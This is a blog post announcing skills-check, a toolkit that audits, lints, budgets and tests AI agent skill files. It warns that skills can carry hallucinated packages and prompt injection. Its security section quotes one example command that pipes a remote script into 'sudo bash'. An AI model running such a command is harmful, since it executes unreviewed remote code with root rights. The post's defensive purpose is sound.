The Missing **Quality Toolkit** for Agent Skills

Two days ago I wrote about the shelf life problem that agent skills rot silently as upstream products ship new versions, and that nobody had built dependency management for agent knowledge. I shipped skill-versions to solve it: a registry, a version checker, and an AI-assisted refresh loop.

That tool works. It catches staleness. It saves real time.

But as I used it, I kept running into problems that staleness checking alone can't solve.

The shelf life was just the first crack

A skill can be perfectly current and still be dangerous. It can reference a package that doesn't exist on npm, a hallucinated dependency that an LLM invented during authoring. It can contain a curl | bash pipe that silently installs something you never reviewed. It can have prompt injection patterns buried in its instructions, turning your helpful coding agent into something that exfiltrates environment variables.

A skill can be well-structured and still be wasteful. If you're loading 57 skills into an agent's context window and three of them share 40% of their content verbatim, you're burning tokens on redundancy. At Claude Opus pricing, that adds up. At scale, it adds up fast.

A skill can pass every check and still violate your organization's rules. Maybe your team requires all skills to come from approved sources. Maybe you've banned certain shell patterns after an incident. Maybe you need every skill to carry a license field before it touches production.

Staleness was the symptom I noticed first because it was the most visible. But underneath it, there's a whole category of quality and integrity problems that agent skills share with every package ecosystem ever built — problems that every language community has spent years solving, independently, in roughly the same order.

Every language learns the same lessons

I spent a meaningful part of my career in the early Node.js community. I watched npm grow from a few hundred packages to hundreds of thousands. I watched the ecosystem learn, sometimes painfully, that a package registry without quality infrastructure is a liability.

But here's the thing: npm wasn't the first to learn these lessons. It wasn't even close.

CPAN had them in the early 2000s. RubyGems hit the same walls around 2009. PyPI grew through the same growing pains. Cargo learned from all of them and shipped with most of the answers built in from day one. Go modules arrived even later and made even more opinionated choices about integrity and reproducibility. Every single language ecosystem, without exception, eventually builds the same core infrastructure:

Staleness detection. npm outdated, cargo outdated, poetry show --outdated, pip list --outdated, bundle outdated. Every ecosystem builds a way to ask "what's behind?" because dependencies drift and nobody remembers to check manually. Skills need this too. That's what skill-versions built.

Security auditing. npm audit, cargo audit, pip-audit, bundle audit, safety check. After enough supply chain incidents — npm's event-stream, PyPI's typosquatting campaigns, RubyGems' malicious packages, every ecosystem builds tooling to ask "is this safe?" not just "does this install?" Skills need the same thing. A skill that references @vercel/analytics-next (a package that doesn't exist) is a supply chain attack vector if someone squats that name. A skill that tells your agent to curl https://some-domain.com/setup.sh | sudo bash is a privilege escalation waiting to happen. This isn't hypothetical, it's the same class of attack that hit every package ecosystem before it.

Lockfiles and integrity verification. package-lock.json, Cargo.lock, poetry.lock, Gemfile.lock, go.sum. Because knowing what you installed last Tuesday doesn't help if someone published a malicious patch in between. The mechanism varies, npm uses SHA hashes, Go uses a transparency log, Cargo uses checksums, but the principle is universal: verify that what you got is what you expected. Skills need version verification too, when someone bumps a skill from 1.0.0 to 1.0.1, did the content actually change by a patch amount? Or did they sneak in a breaking rewrite?

Linting and structural validation. ESLint, Clippy, Ruff, RuboCop, go vet. Every language eventually decides that consistent structure, required metadata, and format validation prevent entire categories of bugs before they ship. Skills need linting, is there a name field? A description? Is the product-version valid semver? Is the SPDX license identifier real? These are the same questions cargo publish asks about Cargo.toml and npm publish asks about package.json.

Testing frameworks. Jest, cargo test, pytest, RSpec, go test. Because you can't trust code you don't test. This is so fundamental that Cargo and Go ship their test runners as part of the language toolchain, they don't even make you pick a framework. Skills need testing too. You should be able to declare eval suites that verify an agent actually does the right thing when it reads your skill.

Registry policies. .npmrc, Artifactory, private PyPI indexes, GOPROXY, cargo registry configuration. Because in an enterprise, not every package on the public registry is acceptable. Every organization eventually needs to control what comes in. Skills need the same policy enforcement, which sources are trusted, which patterns are banned, which metadata is mandatory before a skill touches production.

The pattern is so consistent it's almost boring. A new packaging format emerges. People publish packages. The ecosystem grows. Things break. The community builds quality tooling. Rinse, repeat. CPAN did it. RubyGems did it. PyPI did it. npm did it. Cargo did it. Go modules did it.

Agent skills are just the next iteration. The "language" is markdown. The "packages" are SKILL.md files. The "runtime" is an LLM with file system and shell access. But the failure modes are identical, and the solutions are the same solutions; adapted, not invented.

The only question is whether we learn from the ecosystems that came before us, or whether we insist on re-discovering each lesson the hard way.

skill-versions becomes skills-check

In building and making skill-versions, I realized we need to solve all of the above outlined items, not just the one that is causing personal frustration right now.

And so skill-versions is now skills-check — a unified toolkit with ten commands that cover the full quality and integrity lifecycle for agent skills. The original check and refresh commands are still there, doing exactly what they did before. But they're now part of something larger.

Here's the full picture:

What you already know

skills-check check — Detect version drift by comparing product-version frontmatter against npm registry. The same thing skill-versions did, same speed, same output.

skills-check refresh — AI-assisted updates for stale skills. Spawns an LLM to research changelogs and propose targeted edits. Still supports Anthropic, OpenAI, and Google providers.

skills-check report — Generate formatted staleness reports in markdown or JSON. Drop it in a PR, pipe it to a dashboard, whatever works for your workflow.

What's new

skills-check audit — Security scanning purpose-built for skills. Checks whether referenced npm, PyPI, and crates.io packages actually exist (hallucination detection). Scans for prompt injection patterns, instruction overrides, data exfiltration attempts, obfuscated payloads. Flags dangerous shell commands. Verifies URL liveness. Validates metadata completeness. Outputs in terminal, JSON, markdown, or SARIF format (so findings appear directly in GitHub's Security tab). Bear in mind, this is not a replacement for Snyk or Socket - you should absolutely use those tools for all the reasons well articulated here — those tools do deep supply chain analysis and skills.sh already integrates them at submission time. audit focuses on what they don't cover: do the packages your skill references even exist? Are the URLs still alive? Is there injection hiding in the instructions? In the future, though I haven't yet explored it, I would love to collaborate and find a way to integrate those tools into skills-check audit.

skills-check lint — Metadata validation with auto-fix. Four rule sets: required fields (name, description), publish-ready fields (author, license, repository), conditional fields (product-version when products are referenced), and format validation (semver, SPDX license identifiers, valid URLs). The --fix flag populates missing fields from git context, it reads your commit history to infer author, repository URL, and license. One hundred plus SPDX identifiers supported, including compound expressions with OR and AND.

skills-check budget — Token cost analysis. Counts tokens per skill and per section using the cl100k_base encoding. Detects redundancy between skills via 4-gram Jaccard similarity, if two skills share significant content, you'll know. Estimates cost across model pricing tiers (Claude Opus, Sonnet, Haiku, GPT-4o). Supports snapshot comparison so you can track how your context budget changes over time.

This one seems to have no equivalent anywhere. Nobody's built token budgeting for agent knowledge before, perhaps just not many people are loading mass numbers of agents and skills (did that once, didn't work out well). If you're loading skills into context windows and paying per token, this is the command that tells you where your money is going.

skills-check verify — Semver verification for skill content. When a skill bumps from 1.2.0 to 1.3.0, did the content actually change by a minor amount? Uses a two-layer classifier: heuristic rules first (section diffs, package changes, content similarity), then LLM-assisted classification for uncertain cases. Think of it as cargo semver-checks but for knowledge instead of API surfaces.

skills-check test — Eval test runner. Declare test suites in cases.yaml files alongside your skills. Define prompts, expected outcomes, and grading criteria. Seven built-in graders: file-exists, command exit codes, regex contains/not-contains, JSON matching, package presence, LLM rubric scoring, and custom (dynamic module import). Run tests through agent harnesses, Claude Code CLI, or any shell command. Trial-based execution with configurable pass thresholds and flaky test detection. Baseline storage for regression tracking. If the concept of evals are new to you, be sure to read this great article on the topic, it's a new-ish concept that can help you write better tests for your agent skills and ensure they behave as expected from model to model.

This is the one I'm most excited about. After you run refresh to update a stale skill, you can run test to verify the agent still behaves correctly. Regression detection for agent knowledge.

skills-check policy — Policy-as-code via .skill-policy.yml. Define organizational rules: trusted sources (allow/deny with glob matching), required and banned skills, metadata requirements, content pattern deny/require lists, freshness limits, and audit integration (automatically runs audit when audit.require_clean is configured). Policy file discovery walks up directories for monorepo support.

skills-check init — Scaffold a skills-check.json registry from an existing skills directory. Interactive or non-interactive with auto-detection.

All of it, in CI

Every command supports --json for machine-readable output, --ci for strict exit codes, and --fail-on <severity> for configurable thresholds. There's a GitHub Action (voodootikigod/skills-check@v1) that runs any combination of commands with per-command threshold inputs. Drop it in your workflow and skills get the same quality gates as your code:

- uses: voodootikigod/skills-check@v1
  with:
    commands: check audit lint budget policy
    audit-fail-on: high
    budget-max-tokens: 50000

The architecture tax I'm glad I paid

The whole CLI follows a single architectural pattern borrowed from the audit command: extractor/checker/reporter. Parse SKILL.md files once, extract structured data (packages, URLs, shell commands, frontmatter, sections), pass that data to independent checkers, filter findings through ignore rules, and output through reusable reporters.

This means checkers are testable in isolation, reporters work across commands, and new checks are additive - you add a checker, not a rewrite. The test suite has 91 files with 688 tests. Every network-dependent module is mocked. It's the kind of architecture that makes adding the eleventh command boring in the best way.

What comes next

skills-check handles analysis, verification, and maintenance. It deliberately doesn't handle distribution, installation, or lifecycle management, that's what skills.sh does, and Andrew Qu is a colleague and friend of mine. The tools are complementary. skills.sh installs your skills. skills-check keeps them safe.

There are natural integration points I'm looking forward to building: skills-check audit as a pre-install hook in skills.sh. Budget reports per dependency group once skills.sh implements them. Policy source rules that reference skills.sh registry sources. Deprecation status feeding into health reports.

The Agent Skills ecosystem is still young. We're at the "move fast and figure out governance later" phase that npm was at around 2013, that PyPI was at around 2015, that every ecosystem passes through on its way to maturity - it's bumpy, it can be ugly, and it can be chaotic. The difference is we've already seen how this movie ends — six times over, across six language communities. We know that quality infrastructure isn't optional. It's what determines whether the ecosystem earns trust or becomes a liability.

Migration from skill-versions

If you're using skill-versions today, migration is straightforward:

npm install -g skills-check
npm uninstall -g skill-versions

The check, refresh, and report commands work identically. Your skills-check.json registry (previously product-registry.json) is the same format. The only change is the package name and the fact that you now have seven additional commands available when you need them.

skill-versions will receive a final release pointing users to skills-check, then go into maintenance mode. Everything it did (over that whole two days -- things move so fast these days) lives on in this unified toolkit.

The point

Every packaging format is a language. Rust has .rs files and Cargo.toml. Python has .py files and pyproject.toml. Agent skills have .md files and YAML frontmatter. The syntax differs, but the quality problems don't.

Agent skills look like documentation but they execute like code. They run inside agents that have file system access, shell access, and network access. A bad skill isn't a typo in a README — it's a vector for hallucinated dependencies, privilege escalation, and silent quality degradation. The same classes of attacks that hit CPAN, RubyGems, PyPI, npm, and crates.io will hit skill registries. It's not a matter of if, only a matter of how frequently.

CPAN learned. RubyGems learned. PyPI learned. npm learned. Cargo was smart enough to learn from them all and ship with the answers built in. We should be at least that smart.

skills-check is the quality toolkit I wish existed when I started building agent skills, so now it does. Use it locally, run it in CI, enforce policy across your organization. Your agents are only as good as their instructions, and those instructions deserve the same rigor every language community eventually gives its packages - whether the language is Rust, Python, JavaScript, or markdown.

skills-check is available on npm and as a GitHub Action. Documentation is available at skillscheck.ai. The Agent Skills Specification lives at agentskills.io.